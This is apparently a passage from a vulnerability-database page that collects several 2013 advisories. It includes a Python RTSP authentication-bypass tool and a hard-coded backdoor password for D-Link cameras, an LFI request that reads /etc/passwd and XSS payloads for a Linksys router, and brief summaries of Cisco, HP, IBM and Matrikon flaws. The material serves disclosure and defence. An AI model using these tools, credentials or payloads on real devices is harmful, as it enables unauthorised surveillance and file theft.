# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability. 2013-03-20:
D-Link team asks for a technical description of the vulnerability. 2013-03-20:
Core sends a draft advisory with technical details and set the estimated
publication date of the advisory for May 14th, 2013. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU). 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release). 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202002-0520 | CVE-2013-2679 |
Cisco Linksys E4200 Router Cross-Site Scripting Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0092, VAR-E-201302-0093, VAR-E-201302-0094, VAR-E-201304-0093, VAR-E-201301-0122 |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi. Cisco Linksys E4200 A cross-site scripting vulnerability exists in routers.Information may be obtained and tampered with. The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may cause the attacker to steal cookie-based authentication and launch other attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,
Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,
CVE-2013-2683, CVE-2013-2684
=============================================
Summary
Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router
Firmware Version: 1.0.05 build 7 were discovered by our Researchers in
January 2013 and finally acknowledged by Linksys in April 2013. The Vendor
is unable to Patch the Vulnerability in a reasonable timeframe. This
document will introduce and discuss the vulnerability and provide
Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version
1.10 Released on July 9, 2012, and prior versions.
=============================================
Overview
Linksys is a brand of home and small office networking products and a
company founded in 1988, which was acquired by Cisco Systems in 2003. In
2013, as part of its push away from the consumer market, Cisco sold their
home networking division and Linksys to Belkin.
Products currently and previously sold under the Linksys brand name include
broadband and wireless routers, consumer and small business grade Ethernet
switching, VoIP equipment, wireless internet video camera, AV products,
network storage systems, and other products.
Linksys products were widely available in North America off-the-shelf from
both consumer electronics stores (CompUSA and Best Buy), internet
retailers, and big-box retail stores (WalMart). Linksys' significant
competition as an independent networking firm were D-Link and NetGear, the
latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF
ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoC's
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware
submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila
_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
�..
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t
ype=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoC�s
=============================================
&ping_ip='><script>alert(1)</script>
&ping_size='><script>alert(1)</script>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d"><script>alert(1)</script>
=============================================
CVE Information
=============================================
File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684
CVSS Version 2 Score = 4.5
=============================================
END
=============================================
-----BEGIN PGP SIGNATURE-----
Version: 10.2.0.2526
wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser
M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG
uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy
ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy
7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI
V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==
=w123
-----END PGP SIGNATURE-----
| VAR-201304-0175 | CVE-2013-1227 | Cisco Unified Communications Domain Manager of Web Cross-site scripting vulnerability in the framework |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the web framework in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCug37902. Vendors have confirmed this vulnerability Bug ID CSCug37902 It is released as.By any third party Web Script or HTML May be inserted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCug37902. This component features scalable, distributed, and highly available enterprise Voice over IP call processing
| VAR-201304-0564 | CVE-2013-117959454 | Multiple Cisco Products SNMP and License Manager Buffer Overflow Vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The Cisco MDS 9000 is a family of multi-layer intelligent optical channel switches from Cisco. Cisco Nexus is a data center-class switch from Cisco. A Cisco NX-OS-based device has a buffer overflow vulnerability in its SNMP subsystem that allows authenticated remote attackers to send a malicious SNMP query over UDP port 161 to trigger a buffer overflow on the device SNMP and license manager components. . SNMP is disabled by default and requires administrator configuration before it can be used. Since SNMP is mainly based on the UDP protocol, it can be utilized without completing the TCP three-way handshake, and the attack can be performed by forging the source. The attacker needs to know the public strings of SNMP V1 and V1 to exploit this vulnerability. An SNMP V3 device is configured. The attacker needs a valid username and password for use.
| VAR-201304-0555 | No CVE | D-Link DIR-635 Multiple Security Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
D-Link DIR-635 is a wireless router from D-Link.
The following security vulnerabilities exist in D-Link DIR-635: 1. HTML injection vulnerability 2. Cross-site request forgery vulnerability 3. Cross-site scripting vulnerability 4. Security bypass vulnerability. When a user browses an affected website, his browser will execute arbitrary code provided by the attacker, which may cause the attacker to steal cookie-based authentication, perform unauthorized operations in the context of the user session, or there may be other forms of attack. Other attacks are also possible
| VAR-201304-0028 | CVE-2012-5221 | plural HP Vulnerability to read arbitrary file in firmware of laser printer |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in the PostScript Interpreter, as used on the HP LaserJet 4xxx, 5200, 90xx, M30xx, M4345, M50xx, M90xx, P3005, and P4xxx; LaserJet Enterprise P3015; Color LaserJet 3xxx, 47xx, 5550, 9500, CM60xx, CP35xx, CP4005, and CP6015; Color LaserJet Enterprise CP4xxx; and 9250c Digital Sender with model-dependent firmware through 52.x allows remote attackers to read arbitrary files via unknown vectors. HP LaserJet Printers is a family of laser printers developed by Hewlett Packard. Multiple HP Laser Printer products have security vulnerabilities that allow remote attackers to exploit vulnerabilities to bypass certain security restrictions and access certain files.
Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03744742
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03744742
Version: 3
HPSBPI02869 SSRT100936 rev.3 - HP LaserJet MFP Printers, HP Color LaserJet
MFP Printers, Certain HP LaserJet Printers, Remote Unauthorized Access to
Files
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
The vulnerability could be exploited remotely to gain unauthorized access to
files.
References: CVE-2012-5221, iDefense [V-bxys4j4rnm], SSRT100936
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Please refer to the RESOLUTION
below for a list of impacted products .
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-5221 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks Andrei Costin working with the iDefense
Vulnerability Contributor Program for reporting this vulnerability to
security-alert@hp.com.
RESOLUTION
HP recommends following the HP Imaging and Printing Security Best Practices
available at http://h71028.www7.hp.com/enterprise/downloads/HP-Imaging10.pdf
. Page 51 documents how to disable file access via Postscript.
In addition, HP has provided firmware updates that address this potential
vulnerability. Please see the table below. To obtain the updated firmware, go
to www.hp.com and follow the below steps to obtain the firmware Update.
Obtain the firmware update from www.hp.com :
Select "Drivers & Software".
Enter the product name listed in the table below into the search field.
Click on "Search".
Click on the appropriate product.
Under "Select operating system" click on "Cross operating system (BIOS,
Firmware, Diagnostics, etc.)" Note: If the "Cross operating system ..." link
is not present, select any Windows operating system from the list.
Select the appropriate firmware update under "Firmware". Note use the
firmware version listed or a more recent version, one that has a higher
revision number.
Firmware Updates Product Name
Model
Firmware Update Version
HP Color LaserJet 3000
Q7534A
v 46.070.1 (or higher)
HP Color LaserJet 3800
Q5981A
v 46.070.1 (or higher)
HP Color LaserJet 4700
Q7492A
v 46.220.1 (or higher)
HP Color LaserJet 4730 Multifunction Printer
Q7517A
v 46.370.1 (or higher)
HP Color LaserJet CM4730 Multifunction Printer
CB480A
v 50.272.8 (or higher)
HP Color LaserJet 5550
Q3714A
v 07.220.1 (or higher)
HP Color LaserJet 9500 Multifunction Printer
C8549A
v 08.280.1 (or higher)
HP Color LaserJet CM6030 Multifunction Printer
CE664A
v 52.243.0 (or higher)
HP Color LaserJet CM6040 Multifunction Printer
Q3939A
v 52.243.0 (or higher)
HP Color LaserJet CP3505
CB442A
v 03.150.1 (or higher)
HP Color LaserJet CP3525
CC469A
v 06.171.2 (or higher)
HP Color LaserJet CP4005
CB503A
v 46.220.1 (or higher)
HP Color LaserJet CP6015
Q3932A
v 04.191.2 (or higher)
HP Color LaserJet Enterprise CP4025
CC490A
v 07.151.3 (or higher)
HP Color LaserJet Enterprise CP4525
CC493A
v 07.151.3 (or higher)
HP LaserJet 4240
Q7785A
v 08.240.1 (or higher)
HP LaserJet 4250
Q5400A
v 08.240.1 (or higher)
HP LaserJet 4345 Multifunction Printer
Q3942A
v 09.290.1 (or higher)
HP LaserJet 4350
Q5407A
v 08.240.1 (or higher)
HP LaserJet 5200L
Q7543A
v 08.220.8 (or higher)
HP LaserJet 5200N
Q7543A
v 08.220.8 (or higher)
HP LaserJet 9040
Q7697A
v 08.240.2 (or higher)
HP LaserJet 9040 Multifunction Printer
Q3721A
v 08.280.1 (or higher)
HP LaserJet 9050
Q7697A
v 08.240.2 (or higher)
HP LaserJet 9050 Multifunction Printer
Q3721A
v 08.280.1 (or higher)
HP LaserJet Enterprise P3015
CE526A
v 07.171.2 (or higher)
HP LaserJet M3027 Multifunction Printer
CB416A
v 48.292.8 (or higher)
HP LaserJet M3035 Multifunction Printer
CB414A
v 48.292.8 (or higher)
HP LaserJet CM3530 Multifunction Printer
CC519A
v 53.222.8 (or higher)
HP LaserJet M4345 Multifunction Printer
CB425A
v 48.292.8 (or higher)
HP LaserJet M5025 Multifunction Printer
Q7840A
v 48.292.8 (or higher)
HP LaserJet M5035 Multifunction Printer
Q7829A
v 48.292.8 (or higher)
HP LaserJet M9040 Multifunction Printer
CC394A
v 51.242.7 (or higher)
HP LaserJet M9050 Multifunction Printer
CC395A
v 51.242.7 (or higher)
HP LaserJet P3005
Q7812A
v 02.180.1 (or higher)
HP LaserJet P4014
CB507A
v 04.201.2 (or higher)
HP LaserJet P4015
CB509A
v 04.201.2 (or higher)
HP LaserJet P4515
CB514A
v 04.201.2 (or higher)
HP 9250c Digital Sender
CB472A
v 48.282.8 (or higher)
HISTORY
Version:1 (rev.1) - 25 April 2013 Initial release
Version:2 (rev.2) - 29 May 2013 Added a work around, added CM3530 printer,
added a CM4730 printer, changed firmware version on CP3525, CM6030, CM6040
printers, changed model numbers for 9050 printer, added leading '0' to all
firmware versions whose major version was a single digit. Merged 'Supported
Software Versions' table, into 'Resolution' table.
Version:3 (rev.3) - 20 February 2014 Updated firmware versions in 'Supported
Software Versions' table, clarified Resolution instructions.
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlMGKroACgkQ4B86/C0qfVlS8gCcDgxsY8t4pERTC03RMDZbJBvm
W4kAn3OHeoC8tSpppNV6haPe4+bwz+ro
=oxhf
-----END PGP SIGNATURE-----
. Alternatively, to use the work around, please follow the steps in the
'work around'
| VAR-201305-0242 | CVE-2013-0582 | IBM Tivoli Federated Identity Manager and Tivoli Federated Identity Manager Business Gateway Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.12, 6.2.1 before 6.2.1.5, and 6.2.2 before 6.2.2.4 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.12 and 6.2.1 before 6.2.1.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL that triggers a SAML 2.0 response.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. The product provides web and federated single sign-on (SSO) capabilities to users across multiple applications
| VAR-201305-0093 | CVE-2013-0666 | MatrikonOPC Security Gateway Service operation in the configuration utility (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The configuration utility in MatrikonOPC Security Gateway 1.0 allows remote attackers to cause a denial of service (unhandled exception and application crash) via a TCP RST packet. MatrikonOPC is the world's largest OPC developer and supplier.
MatrikonOPC A and E Historian and Security Gateway handle a specially crafted reset message (RST). Multiple MatrikonOPC products are prone to a remote denial-of-service vulnerability. A vulnerability exists in the configuration utility in version 1.0 of MatrikonOPC Security Gateway